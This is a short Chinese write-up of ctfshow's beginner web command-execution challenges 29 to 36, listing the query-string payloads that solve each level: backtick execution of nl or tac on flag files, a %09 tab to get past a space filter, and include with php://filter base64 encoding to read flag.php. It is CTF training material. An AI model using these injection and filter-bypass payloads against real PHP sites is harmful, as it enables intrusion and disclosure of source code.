ctfshow-web入门命令执行29

29

源代码给了禁用flag

使用tac、nl

复制代码
?c=echo `nl f*`;
?c=echo `tac f*`;

30

多禁用了system和php

和上题区别不大,使用上一题命令就能解

?c=echo `nl f*`;

?c=echo `tac f*`;

31

禁用了空格使用%09代替

?c=echo%09`tac%09f*`;

32

禁用了echo

使用php伪协议

?c=include$_GET["1"]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

最后解一下base64就行了

33

多过滤了"

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

34-36

一样命令就可以得到flag

相关推荐
hopsky6 小时前
docker 容器文件异常大的问题排查
运维·docker·容器
鹏大师运维6 小时前
统信UOS CVE-2026-31431漏洞怎么修?先看漏洞,再看3种修复方法
linux·内核·deb·漏洞修复·统信uos·补丁·本地提权
feng_you_ying_li7 小时前
liunx之软硬链接与库的制作原理(1)
linux
bloglin999997 小时前
兼容旧版 docker-compose 和新版 docker compose
运维·docker·容器
怀旧,7 小时前
【Linux网络编程】6. 传输层协议 UDP
linux·网络·udp
黄金矿工Kingliu7 小时前
经典hadoop案例应用(命令实现版)
大数据·服务器·hadoop
宠..7 小时前
VS Code 修改 C++ 标准同时修改错误检测标准
java·linux·开发语言·javascript·c++·python·qt
|_⊙7 小时前
Linux 深入理解文件(IO)
linux·运维·服务器
kyle~7 小时前
Linux时间系统4---从PHC_PTP到ROS 2驱动与控制链路
linux·运维·数码相机
largecode7 小时前
给用户打电话,怎么在对方手机显示为“XX旅游”?号码认证办理教程
linux·服务器·容器·智能手机·ssh·旅游·vagrant